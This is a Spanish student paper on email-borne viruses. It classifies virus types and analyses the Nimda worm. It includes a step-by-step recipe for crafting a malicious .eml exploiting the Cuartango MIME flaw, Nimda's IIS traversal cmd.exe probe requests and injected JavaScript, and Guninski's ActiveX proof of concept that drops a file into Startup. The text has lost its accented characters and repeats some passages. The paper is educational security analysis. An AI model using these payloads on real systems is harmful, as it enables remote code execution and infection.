Ampliacin de Redes

Cmo entran los virus a travs del correo?

David Navarro Arnao

INTRODUCCIN

La utilidad de este trabajo trata de ser el de aclarar algunos conceptos sobre los virus informticos intentando ser un desarrollo del tema de seguridad de la asignatura Ampliacin de Redes. Pretende dar una idea general del mbito de los virus informticos dando una clasificacin de estos y centrndose en un tipo de ellos. Se trata de los virus que se autoejecutan al recibir un correo electrnico, sin ejecutar adjuntos y ni tan siquiera abrirlos, solo con un previsualizacin pueden infectar nuestro sistema, como el Nimda por ejemplo. Por lo tanto no pretendo que esto sea una extensa guia de los virus y de los fallos de seguridad que aprovechan. En las conclusiones del trabajo se trataran de dar unas pautas de seguridad para evitar ser infectados por estos virus autoejecutables. OBJETIVOS Este trabajo trata de cumplir con los siguientes objetivos: -Presentar una clasificacin de los virus. -Particularizar sobre un tipo de virus desarrollando las vulnerabilidades que aprovecha, como lo hace y que posible solucin tiene. -Ser un trabajo que complemente el tema de la seguridad dentro de la asignatura Ampliacin de Redes.

MOTIVACIN Y ANTECEDENTES La motivacin que ha llevado a desarrollar este trabajo es la curiosidad. La curiosidad de cmo se puede infectar el ordenador al recibir un correo sin realizar ninguna accin de riesgo (aparente), cumpliendo con consejos como el de no abrir ficheros adjuntos o leer el correo off-line. Esta ser la pregunta que tratar de responder. El presente trabajo queda fuera del rea cubierta por Ampliacin de Redes, ya que esta trat sobre el mantenimiento de la seguridad desde el punto de vista de la identidad de la persona. Se quera asegurar que se dialogaba con quien se pretenda y no con un impostor. Tambin se trat de como mantener la informacin en secreto mediante la criptografa. Otra parte ya ms fsica explicaba el funcionamiento de tarjetas inteligentes y de diseos de firewalls para LAN's para evitar intrusos. Con esto trato de demostrar que la situacin del trabajo queda fuera del temario complementndolo.

DESARROLLO DEL TRABAJO

METODOLOGA El punto de partida del trabajo trat de ser los bugs del Outlook Express confiando que diese paso a sus parches y que desde ellos sacase una explicacin del fallo. Pero los de Microsoft creen contraproducente que se conozcan los detalles de sus agujeros de seguridad en sus programas. As que tuve que cambiar de estrategia y le ped consejo al profesor Carlos Perez que amablemente me dio acceso a su pgina del seminario sobre seguridad. Esta contena links de portales sobre seguridad que me han sido muy tiles. El otro camino a seguir era, evidentemente, las pginas de las compaas de antivirus, las cuales dan una idea bastante general del asunto y ofrecen una biblioteca de virus sobre la que me apoye para describir mis ejemplos. Trat de usar bibliografa, pero no pude encontrar nada concreto sobre el tema que he desarrollado, as que toda mi fuente de informacin se basa en la obtenida de links. DESCRIPCIN DEL TRABAJO REALIZADO Tipos de Virus: Los virus que existen en la actualidad, se pueden clasificar o agrupar en funcin de unas determinadas caractersticas. Dependiendo de stas, algunos de ellos pertenecern a un determinado grupo, pero otros podrn incluirse en varios de ellos. Algunos de los criterios que se tienen en cuenta a la hora de clasificar a los virus, son los siguientes: -Medio a travs del cual realizan su infeccin. -Tcnicas utilizadas para infectar. -Tcnicas utilizadas para ocultarse y evitar a los antivirus. -Tipos de archivos que infectan. -Lugares en los que se esconden, tras la infeccin. -Plataforma o sistema operativo al que atacan A continuacin se muestra una clasificacin que agrupa parte de los tipos de virus ms habituales:

1. Virus de Fichero 2. Virus Residentes 3. Virus de Accin Directa 4. Virus de Sobreescritura 5. Virus de Compaia 6. Virus de Boot 7. Virus de Macro

8. Gusanos 9. Troyanos (caballos de Troya) 10. Bombas Lgicas 11. Encriptados 12. Multipartites 13. Residentes 14. Polimrficos

La anterior tabla est desarrollada en el Apndice A con la definicin de cada tipo.

CMO SE INTRODUCEN LOS VIRUS EN NUESTRO PC A TRAVS DEL MAIL? Aunque nos parezca que slo sucede en las pelculas, lo cierto es que por el mero hecho de visitar una pgina web o ver (incluso previsualizar) un mail que hayamos recibido, es posible que se est introduciendo en nuestro PC un programa malicioso, no slo un gusano (Worm), sino un programa que permite al atacante tener el control total de nuestro PC. Son muchos los bugs que se han encontrado en el Outlook y en el Internet Explorer, que permiten acciones de este tipo, aqu se sealan slo aquellas que considero mas relevantes, por ahora explico una de las mas sencillas, la de Cuartango, ( que aprovecha un fallo entre el Outlook y el Windows Media Player ), y una de las de Guninski, en el apartado de "Webs infectadas" dentro del manual para el GodWill, en el Apndice B est el report de Guninski. El espaol Juan Carlos Garca Cuartango descubri el 30 de Marzo del 2001 una vulnerabilidad en el Internet Explorer 5 y en el Outlook que permita, entre otras cosas introducir en un PC, a travs del correo cualquier programa de forma totalmente oculta. El famoso gusano Nimda, que se localiz el 18-9-2001, es la motivacin del presente trabajo y utiliza este sistema de infeccin basado en la vulnerabilidad de Cuartango. A continuacin se presenta un anlisis profundo del funcionamiento de ste gusano. El problema radica en los archivos con extensin .EML. Este tipo de archivos contienen mensajes de correo en formato "MIME Multipart", que es el formato utilizado para enviar cualquier mensaje de correo va un servidor SMTP. La pregunta es qu tiene eso que ver con el navegador IE?. Pues bien; dicho navegador interpreta ese tipo de archivos para visualizar el contenido de un mensaje de correo. Adjuntando un archivo ejecutable, y mediante una manipulacin a travs de un trama (<IFRAME>) embebida en el cuerpo del mensaje, el navegador IE ejecutar el cdigo contenido en el archivo adjunto. El asunto parece complicado, pero como un ejemplo vale ms que mil palabras, he puesto un ejemplo que obtuve de Kriptpolis. En este caso, inhibir los scripts no soluciona el problema, sino que es necesario descargarse el parche publicado por Microsoft.

Existe otra solucin, que consiste en la instalacin del reproductor Windows Media Player 7 (con el parche que corrige un importante error de dicho software), o del reproductor Real Audio. sto tambin puede sonar incomprensible, pero es que el problema parece radicar en un incorrecto tratamiento de archivos audio por parte del navegador IE, cuando el reproductor de dichos archivos es el estndar Window Media Player 6. Aunque parezca mentira es extremadamente sencillo crear un mail malicioso que introduzca el programa que se desee, estos son los pasos a seguir para comprobar por ti mismo el grave bug de Microsoft: Bjandose el ejemplo de Cuartango *exe.eml* y editndolo con un editor de textos se puede apreciar la siguiente cabecera: From: "xxxxx" Subject: mail Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 Sustityela por: From: *bill@gates.com* To: *mi@victima.com* Subject: mail Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff> <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> I will execute a program<BR> </BODY> </HTML> Aqu viene la clave, se puede ver mas abajo la parte que pertenece al archivo adjunto del mail. --1 Content-Type: audio/x-wav; name="hello.exe" Content-Transfer-Encoding: base64 Content-ID: <THE-CID>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAA= --1 Todo esta cantidad de letras y smbolos, es el binario que va adjunto en el mensaje, pasado a cdigo BASE 64, pero si nos fijamos vemos que en el campo Content-Type aparece audio/x-wav, lo cual no se corresponde con el verdadero contenido del archivo, y es aqu donde radica el fallo encontrado por Cuartango. Si un atacante se propone introducir en nuestro PC un programa para controlar de forma remota nuestro PC ( un troyano, un servidor de telnet, de FTP, etc ), lo nico que debe hacer es sustituir esa cantidad de letras y smbolos que se menciona en el prrafo anterior por otro, que resulte de pasar el programa deseado a BASE 64. Para ello slo se necesita un programa como el Wincode si usas windows, o simplemente adjuntar dicho programa a un mail, para despus editar ese mail y sacarlo de ah. Una vez que se tenga slo hay que sustituirlo en el ejemplo. Ahora el mensaje ya est listo para mandar, pero si se intenta mandar con outlook, nos encontramos con el problema de que no permite editar los headers (los encabezados del mensaje), pero si usamos linux no tendremos ningn problema.

Bien, esa es la teora con ejemplo prctico, pero la realidad viene a continuacin. ANLISIS DEL GUSANO NIMDA

El 18 de Septiembre del 2001 (una semana despus de los atentados contra las torres de NY) apareci el gusano Nimda, cuando muchos usuarios comunicaron que estaban sufriendo un ataque al servidor de web, al tiempo que advirtieron tambin, que haban recibido un mail con lo que pareca ser un .wav, la hora de recepcin de dicho mail coincida con el inicio de los ataques de web. Se crey en un principio que se trataba de una variante del Red Code, pero result ser un nuevo gusano llamado Nimda , cuyo nombre oficial es W32/Nimda-A, (NOTA: Nimda es Admin al revs). Tambin se le conoce como: W32.Nimda.A@mm W32.Nimda Worm.Nimda.mm W32.Nimda.A@mm.Worm Est programado probablemente en C y afecta a todos los sistemas Microsoft Windows 95, 98, ME, NT, 2000. En el copyright del gusano se puede leer "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China.", puede ser cierto o no.

Nimda es un gusano que se propaga de cuatro maneras diferentes: 1 Email: Se enva por mail, con un archivo adjunto llamado "readme.exe" y un subject es variable, utilizando el bug encontrado por Cuartango, el del MIME-type "audio/x-wav", explicado en este trabajo, y gracias al cual se ejecuta el readme.exe adjunto (que acciona la infeccin) aunque solamente se vea el preview del Outlook o Outlook Express, stos son vulnerables porque utilizan componentes del Internet Explorer para ver los mensajes con formato HTML. 2 Ataque al Web Server: El gusano busca servidores IIS vulnerables que hayan sido infectados por el Red Code y que tengan abierta la puerta trasera que ste crea, mediante el root.exe. Nimda tambin trata de acceder a los servidores con IIS mediante los bugs de Unicode y de Decode. Utiliza el bug de Unicode para ejecutar el TFTP y bajarse el archivo "admin.dll" desde el PC atacante, aunque tambin trata de bajrselo utilizando las puestas traseras dejadas por otros gusanos como el Red Code. 3 Cdigo web: Nimda aade un cdigo en todos los archivos HTM, HTML y ASP que encuentre en el servidor de web, con lo cual, los que visiten esas webs sern tambin infectados. 4 Nimda se propaga tambin a travs de los recursos compartidos que no hayan sido asegurados, permitiendo el acceso a usuarios no autorizados. sto le permite propagarse a travs de redes internas. Nimda se copia a si mismo con varios nombres "readme.exe", "readme.eml", "riched20.dll", "admin.dll" porque varias herramientas de oficina, incluidas Microsoft Word y WordPad utilizan el "riched20.dll", el Nimda se copia a esos programas si se ejecutan desde el mismo directorio en el que se encuentra.

PORQU ES PELIGROSO EL Nimda? 1 Degrada el funcionamiento de la red debido al alto consumo de ancho de banda durante su propagacin, que es extremadamente rpida. 2 Crea o activa la cuenta de "Guest" (invitado) con permisos de Administrador 3 Garantiza el acceso a C:\ como recurso compartido de red, dando acceso a cualquier usuario. 4 Busca ejecutables y DLL los infecta con el gusano. 5 Busca en el disco local archivos del tipo HTM, HTML, ASP y les aade un cdigo JavaScript con el que consigue propagarse, y ejecutar el archivo llamado readme.eml que contiene en el mismo directorio una versin MIME-encoded del Nimda. Este es JavaScript que ejecuta el readme.eml: <html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> Todo aquel que visite las pginas infectadas con un navegador vulnerable, automticamente se bajar y ejecutar el gusano. Los archivos .eml (mail) y .nws (news) hacen que el Internet Explorer muestre los contenidos del mensaje, pero dicho mensaje ha sido modificado para ejecutar el archivo adjunto "readme.exe" con el bug encontrado por Cuartango, todo ello sin que la vctima se de cuenta.

Todo aquel que visite las pginas infectadas con un navegador vulnerable, automticamente se bajar y ejecutar el gusano. Los archivos .eml (mail) y .nws (news) hacen que el Internet Explorer muestre los contenidos del mensaje, pero dicho mensaje ha sido modificado para ejecutar el archivo adjunto "readme.exe" con el bug encontrado por Cuartango, todo ello sin que la vctima se de cuenta. 6 Borra todas las llaves del registro en SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security,con lo que consigue evitar la seguridad de los recursos compartidos de red. 7 Modifica el System.ini gracias a lo cual se ejecuta en cada inicio. Esta es una lista de los ataques que Nimda utiliza para busca otros PCs con vulnerabilidades: GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe ?/c+dir GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Estos son los nombres que puede tener el Nimda: readme.exe: Nombre usado en la propagacin por email readme.eml: Nombre utilizado en la propagacin mediante pginas web modificadas. admin.dll: Este nombre es usado durante la transferencia de TFTP desde el PC atacante hasta la victima. Este archivo es copiado al root de todos los discos. Existe un admin.dll vlido, porque es parte del FrontPage Server Extensions. mmc.exe: Nombre utilizado por el gusano durante la primera infeccin. Este archivo est en %Windows%\%System%. "mmc.exe" y es el ejecutable del Microsoft Management Console. El gusano lo sobrescribe si existe. load.exe: Nombre usado por el gusano cuando se copia a si mismo %Windows%\%System%. riched20.dll: El gusano infecta o reemplaza esta DLL. Porque varias herramientas del Office lo utilizan, incluidos Microsoft Word y WordPad, el gusano infecta estos programas si se infectan desde su mismo directorio.

Los puertos utilizados son: TCP 137-139, 445: NetBIOS. Estos puertos son usados durante la transmisin del gusano. TCP 80: HyperText Transfer Protocol.El gusano lo usa cuando se transporta a travs de los HTM HTML o ASP infectados. TCP 25 SMTP: A travs de este puerto se mandan los mails. UDP 69 TFTP: Este puerto es el que usa el TFTP cuando el gusano lo ejecuta.

CONCLUSIONES
Creo que los objetivos que se propusieron para este trabajo han sido cumplidos, teniendo en cuenta cual era la principal motivacin del trabajo. Explicar como se pueden infectar nuestros ordenadores a travs del correo electrnico procurando una explicacin lo ms seria posible. Y como limpiarlo. La conclusin a todo esto es que se deben actualizar las versiones de software tanto de audio como de correo electrnico as como seguir consejos de seguridad como el de no abrir adjuntos de desconocidos, leer correo off-line y procurar pasar un antivirus al correo. Lo ms increible es que miles de personas hayan sido infectadas por el Nimda cuando Cuartango nos habia advertido un mes antes de la debilidad del software de Microsoft. Pero me temos que esta empresa no tomo las medidas oportunas para evitarlo hasta que el mal estuvo hecho.

APNDICE A
1. Virus de Fichero: este tipo de virus se encarga de infectar programas o ficheros ejecutables (archivos con extensiones EXE o COM). Al realizar la ejecucin de uno de estos programas, de forma directa o indirecta, el virus se activa produciendo los efectos dainos que le caractericen en cada caso. La mayora de los virus existentes son de este tipo, pudindose clasificar cada uno de ellos en funcin de las acciones que realizan cada uno de ellos en cada caso. 2.Virus Residentes: cuando se ponen en marcha o activan, la primera accin que realizan consiste en comprobar si se cumplen todas las condiciones (fecha, hora,... etc.) para atacar. De no ser as, se colocan en una zona de la memoria RAM, esperando que se ejecute algn programa. Si en alguna de las operaciones que realiza el sistema operativo se trabajase con un fichero ejecutable no infectado, el virus lo infectar. Para ello, el virus se aadir al programa que infecta, aadiendo su cdigo al propio cdigo del fichero ejecutable. Algunos virus de este tipo realizan modificaciones en la configuracin del sistema (en el Registro de Windows, entre otros), para volver a colocarse en la memoria como residentes, siempre que se vuelva a encender o reiniciar el ordenador. Desde su condicin de residentes, interceptarn determinados servicios del sistema operativo. Dichos servicios pueden ser utilizados por los programas, cuando se estn ejecutando. Esto quiere decir que los virus residentes podrn interferir en las acciones que lleven a cabo los programas que se estn ejecutando en un determinado momento. El resultado es que el virus puede alterar los servicios que necesita el programa, para que apunten o ejecuten partes del cdigo correspondiente al propio virus. Esto implica que el virus residente se ejecutar siempre que un programa necesite y acceda a los servicios del sistema operativo.

que lleven a cabo los programas que se estn ejecutando en un determinado momento. El resultado es que el virus puede alterar los servicios que necesita el programa, para que apunten o ejecuten partes del cdigo correspondiente al propio virus. Esto implica que el virus residente se ejecutar siempre que un programa necesite y acceda a los servicios del sistema operativo. Ejemplos de virus famosos de este tipo son el Barrotes o el Viernes 13. 3. Virus de Accin Directa: en el momento de su ejecucin, el virus trata de replicarse, o reproducirse. Cumplindose unas determinadas condiciones, particulares y especficas en cada caso, se activar y pasar a realizar infecciones dentro del directorio o carpeta en el que nos encontremos y dentro de los directorios que se encuentran especificados en la lnea PATH dentro del fichero AUTOEXEC.BAT. Este tipo de virus puede ser considerado como un virus de fichero ya que buscan ficheros que puedan ser sus vctimas, para infectarlos. El motivo de que estos virus realicen copias de s mismos o se reproduzcan, es debido a que no son residentes y por lo tanto no permanecen ejecutndose en memoria. Esto les obliga a reproducirse y actuar directamente. 4. Virus de Sobreescritura: este tipo de virus se caracteriza por no respetar la informacin contenida en los ficheros que infecta, haciendo que estos queden inservibles posteriormente. Pueden encontrarse virus de sobreescritura que adems son residentes y otros que no lo son. Aunque la desinfeccin es posible, no existe posibilidad de recuperar los ficheros infectados, siendo la nica alternativa posible la eliminacin de stos. Este tipo de virus puede ser considerado como virus de fichero. Una caracterstica interesante es que los ficheros infectados por virus de sobreescritura, no aumentan de tamao, a no ser que el virus ocupe ms espacio que el propio fichero infectado. Esto es debido a que dicho tipo de virus se coloca encima del contenido del fichero infectado, no se incluye de forma adicional en una seccin del mismo. 5. Virus de Compaa: Al contrario que los virus de sobreescritura o que los residentes, los virus de compaa no modifican los ficheros que infectan. Cuando el sistema operativo est trabajando puede ocurrir que ste tenga que ejecutar un programa con un nombre determinado. Si existen dos ficheros ejecutables con el mismo nombre pero con diferentes extensiones, el sistema operativo ejecutar en primer lugar el que lleve la extensin COM. Esta peculiaridad del sistema operativo es aprovechada por los virus de compaa. En caso de existir un fichero ejecutable con un determinado nombre y extensin EXE, el virus se encargar de crear otro fichero con el mismo nombre pero con extensin COM hacindolo invisible al usuario para evitar levantar sospechas. Tras realizarse la ejecucin del fichero COM correspondiente al virus, ste devuelve el control al sistema operativo para que ejecute el fichero EXE. De esta forma el usuario no tendr conocimiento de la infeccin que en ese preciso instante ha tenido lugar. En definitiva, un virus de compaa, seguir los siguientes pasos: 6. Virus de Boot (sector de arranque): Este tipo de virus, no afectan a los ficheros por lo que el contenido del disco no estar en peligro a no ser que se intente arrancar el ordenador con dicho disco. Si esto ocurre, el virus realizar la infeccin siguiendo una serie de pasos habituales: Se oculta en un determinado sector del disco infectado. Reserva un determinado espacio en memoria para que ste no sea ocupado por ningn otro programa.

Reserva un determinado espacio en memoria para que ste no sea ocupado por ningn otro programa. Se coloca en esa zona reservada de la memoria. Desde esa posicin de memoria, intercepta servicios del sistema operativo. A partir de este momento, ocurrir lo siguiente: Siempre que una aplicacin del sistema operativo llame a una funcin de acceso a ficheros, el virus toma el control. Se comprueba si el disco al que se accede esta infectado. Si no lo est, lo infecta. El virus vuelve a colocar el sector de arranque original (sin infectar). Se modifica el boot original, escribiendo el cdigo vrico en l. De esta forma el virus cede el control al sistema operativo. As parecer no haber ocurrido nada. Si introducimos un disquete infectado en un ordenador, la infeccin podra extenderse al disco duro. En tal caso, se vera afectado el MBR (Master Boot Record) del disco duro. Esto implica que todos los tipos de discos (disquete, CD-ROM, unidades Zip, Unidades Jazz,...) que utilicemos posteriormente en el ordenador infectado, sern igualmente infectados. Estos virus se encargan de guardar una copia del Boot original, pero cada uno de ellos lo puede hacer de una forma diferente. Algunos los copiarn en una determinada seccin del disco y la marcarn como defectuosa. Otros lo almacenan en una seccin del disco donde ya hubiese informacin, perdindose esta (y siendo imposible de recuperar dicha informacin). Finalmente los ms agresivos o peligrosos sobreescriben el boot original, impidiendo el arranque del ordenador con dicho disco. 7. Virus de Macro: los virus de macro realizan infecciones sobre los ficheros (documentos, libros, presentaciones y/o bases de datos) que se han creado con determinadas aplicaciones. Cada uno de estos tipos de ficheros puede tener adicionalmente unos pequeos programas, denominados macros. Una macro no es ms que un micro-programa que el usuario asocia al fichero que ha creado con determinadas aplicaciones. ste no depende del sistema operativo sino de acciones determinadas que el usuario puede realizar dentro del documento que la contiene. Mediante ellos es posible automatizar conjuntos de operaciones para que se lleven a cabo como una sola accin del usuario de forma independiente sin necesidad de realizarlas una a una manualmente. Pues bien, estas macros podran infectarse. En este caso, al abrir un documento que contenga macros, stas se cargarn de forma automtica. Entonces el virus actuar. Al diferencia de lo que se piensa habitualmente, los virus de macro pueden realizar acciones dainas de bastante importancia, propagndose en poco tiempo de forma muy rpida. Las aplicaciones afectadas son Microsoft Word, Excel, Access, Powerpoint, Multi Macro Partite, Lotus Ami Pro y Corel Draw. Ejemplos famosos son: Melissa, Lewinsky, Y2K. 8. Virus de enlace o de directorio: Estos virus se encargan de alterar las direcciones de los programas y directorios para provocar la infeccin de un determinado fichero. Si un programa se encuentra en una direccin concreta, para ejecutarlo habr que acceder a dicha direccin. Sin embargo, el virus de enlace o directorio la habr modificado con

8. Virus de enlace o de directorio: Estos virus se encargan de alterar las direcciones de los programas y directorios para provocar la infeccin de un determinado fichero. Si un programa se encuentra en una direccin concreta, para ejecutarlo habr que acceder a dicha direccin. Sin embargo, el virus de enlace o directorio la habr modificado con anterioridad. Lo que hace es alterar esta direccin (dentro de la FAT) para que apunte al lugar en el que se encuentra el virus, guardando en otro lugar la direccin de acceso correcta. De esta forma, cuando se pretenda ejecutar el fichero, lo que se har realmente es ejecutar el virus. Ya que este tipo de virus puede modificar las direcciones donde se encuentran todos los ficheros del disco (disco duro), su capacidad para infectar TODOS stos es real. De este modo, los virus de enlace o directorio pueden infectar toda la informacin contenida en un disco, pero les es imposible realizar infecciones en unidades de red o agregarse a los ficheros infectados. En caso de realizar un anlisis del disco en busca de errores (mediante programas como SCANDISK o CHKDSK), se detectarn grandes cantidades de errores que identifican todos los enlaces a los ficheros que el virus ha modificado. No obstante, en este caso sera mejor no recuperarlos ya que podra producirse un caos en lo que al sistema de almacenamiento de la informacin se refiere, que sera ms perjudicial si cabe. 9. Gusanos (Worms): los gusanos se diferencian de los virus en que no intentan infectar otros ficheros. Su nico objetivo es propagarse o expandirse a otros ordenadores de la forma ms rpida posible. Por otra parte, emplean tcnicas para replicarse (propagarse). En realidad su objetivo es crear copias de s mismos y con ellas realizar infecciones en otros ordenadores. Las infecciones producidas o reproducciones que stos realizan casi siempre a travs de medios como el correo electrnico, las redes de ordenadores y los canales de IRC en Internet. Tambin es posible que se repliquen dentro de la memoria del PC. Cuando un gusano es ejecutado, permanece as hasta que se apaga o se reinicia el ordenador. No obstante cada uno de ellos utiliza tcnicas diferentes para asegurar su ejecucin siempre que se arranca el ordenador y se entra en Windows. Por ejemplo la modificacin del Registro de Windows. Por otra parte, podra darse en caso de que el gusano estuviese compuesto por varios programas. En tal caso, cada uno de ellos actuar de forma subordinada a uno de stos que se considerar principal. Esta variacin, suele ser denominado como gusano de red. Dependiendo del lenguaje en el que estn escritos, las tcnicas utilizadas para propagarse y otras caractersticas, los gusanos pueden ser de varios tipos: Gusanos de correo electrnico. Son gusanos que se propagan a travs de mensajes de correo electrnico, mediante la utilizacin de programas clientes de correo. Gusanos de IRC (gusanos de mIRC y de Pirch). Son gusanos que se propagan a travs de canales de IRC (Chat). Los programas de IRC que emplean habitualmente para ello, son mIRC y Pirch. Gusanos de VBS (Visual Basic Script). Son gusanos escritos o creados en Visual Basic Script. Gusanos de Windows32. Son gusanos que se propagan a travs de las API de Windows (las funciones pertenecientes a un determinado protocolo de Internet).

Ejemplos de este tipo de virus son: Happy99, Pretty Park, I love you, etc... 10. Troyanos (Caballos de Troya): los troyanos no se pueden considerar virus como tales. Recogen su nombre de la mitologa (el famoso caballo de madera en el que se escondieron los soldados para entrar a la ciudad de forma aparentemente inofensiva, cuando lo que pretendan era realmente hacerse con ella). Del mismo modo funcionan los troyanos. stos parecen ser programas inofensivos que llegan a nuestro ordenador por cualquier medio. Cuando ejecutamos este programa (llevarn nombres o tendrn caractersticas que nos incitarn a ello), se instalar en nuestro ordenador otro programa que podr producir efectos destructivos. En un principio, el troyano podra no activar sus efectos. De todas formas, cuando esto ocurra, se podrn eliminar ficheros, perder la informacin del disco duro, o abrirse los posibles huecos de seguridad a modo de puestas traseras (backdoor) por las que nuestro equipo podra ser atacado. La mayora de ellos se encargan de acceder a determinados puertos de comunicaciones y abrirlos o dejarlos accesibles desde el exterior. En tal caso, a travs de una conexin (en una red local o a travs de Internet) alguien podra acceder a toda la informacin contenida en nuestro equipo, enviar esta informacin a otras direcciones y realizar cualquier tipo de operacin sin nuestro consentimiento. 11. Bombas Lgicas: stos se encargan de activarse y producir destrozos de consideracin en el equipo al que han infectado, slo cuando se cumple/n una/s determinada/s condicin/es. No se consideran virus como tales, ya que no se reproducen, sino que dependen de las acciones realizadas que lleve a cabo el usuario (ste debe copiarlos y/o ejecutarlos, de forma generalmente no intencionada). 12. Encriptados: ms que un tipo de virus, se trata de una tcnica que stos pueden utilizar. Por este motivo, los virus que la utilizan (pudiendo pertenecer a otros tipos o categoras), se suelen denominar tambin encriptados. Esto es, el virus se cifra, codifica o "encripta" a s mismo para no ser fcilmente detectado por los programas antivirus. Para realizar sus actividades, el virus se descifra a s mismo y cuando ha finalizado, se vuelve a cifrar. 13. Multipartites: este tipo de virus pueden realizar mltiples infecciones y hacerlo adems utilizando diferentes tcnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos,... etc. Se consideran bastante peligrosos por su capacidad de combinar muchos tcnicas de infeccin y las acciones que pueden llegar a realizar. 14. Polimrficos: son virus que emplean una nueva tcnica para dificultar su deteccin por parte de los programas antivirus (generalmente, son los virus que ms cuesta detectar). En este caso varan en cada una de las infecciones que llevan a cabo. De esta forma, generan una elevada cantidad de copias de s mismos. Los virus polimrficos se encriptan o cifran de forma diferente (utilizando diferentes algoritmos y claves de cifrado), en cada una de las infecciones que realizan. Esto hace que no se puedan detectar a travs de la bsqueda de cadenas o firmas (ya que stas sern diferentes en cada cifrado).

APNDICE B
Georgi Guninski security advisory #23, 2000 IE 5.5/Outlook security vulnerability executing arbitrary programs com.ms.activeX.ActiveXComponent allows

Systems affected: IE 5.5/Outlook/Outlook Express - probably other versions, have not tested Risk: High Date: 5 October 2000 Legal Notice: This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: Internet Explorer 5.5/Outlook allow executing arbitray programs after viewing web page or email message. This may lead to taking full control over user's computer. Details: The problem is the com.ms.activeX.ActiveXComponent java object which may be instantiated from <APPLET> tag (it throws security exception in java console, but returns object, strange). The com.ms.activeX.ActiveXComponent java object allows creating and scripting arbitrary ActiveX objects, including those not marked safe for scripting. Examine the code below for more information. The code is:

---------javaea.html-----------------------------------------<APPLET code="com.ms.activeX.ActiveXComponent" > </APPLET> <!-- ^^^ This gives java exceptions in java console, but the object is instantiated --> <SCRIPT LANGUAGE="JAVASCRIPT"> a1=document.applets[0];

fn="..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA"; //fn="EA.HTA"; doc="<SCRIPT>s1=\'Hello world\\nTo get rid of this, delete the file EA.HTA in Startup folder\';alert(s1);document.body.innerHTML=s1</"+"SCRIPT>"; function f1() { a1.setProperty('DOC',doc); } function f() { // The ActiveX classid cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}"; a1.setCLSID(cl); a1.createInstance(); setTimeout("a1.setProperty('Path','"+fn+"')",1000); setTimeout("f1()",1500); setTimeout("a1.invoke('write',VA);alert('"+fn+" created');",2000); } setTimeout("f()",1000) </SCRIPT> <SCRIPT LANGUAGE="VBSCRIPT"> VA = ARRAY() ' Just to get something like com.ms.com.Variant[] </SCRIPT> -----------------------------------------------------Regarding this issue and Outlook with "security update" (probably this should be another advisory). It is a bit more difficult to exploit this from Outlook because of the "Outlook security update" which stops "most scripting". It is common misbelief that the "Outlook security update" stops all scripting, but this is not true. It is possible to trigger the execution of Active Script from email message with the help of Java. Send a email message containing <IFRAME SRC="http://somehost/javascript.html"></IFRAME> -----------javascript.html------------<APPLET CODE="outlookjs.class" MAYSCRIPT> <PARAM NAME="command" VALUE="window.open('http://www.guninski.com')"> </APPLET> ------------------------------------------------outlookjs.java--------------import java.applet.Applet; import netscape.javascript.*; class outlookjs extends Applet { public JSObject j; public void init() { try { j=(JSObject) JSObject.getWindow(this);

j.eval(getParameter("command")); } catch (Exception e) {System.out.println(e);}; } } --------------------------------------Workaround: Disable Active Scripting or Java or Scripting of Java applets - better disable all active content in IE. Demostration that executes programs is available Demostration that places a file on Desktop is available

APNDICE C
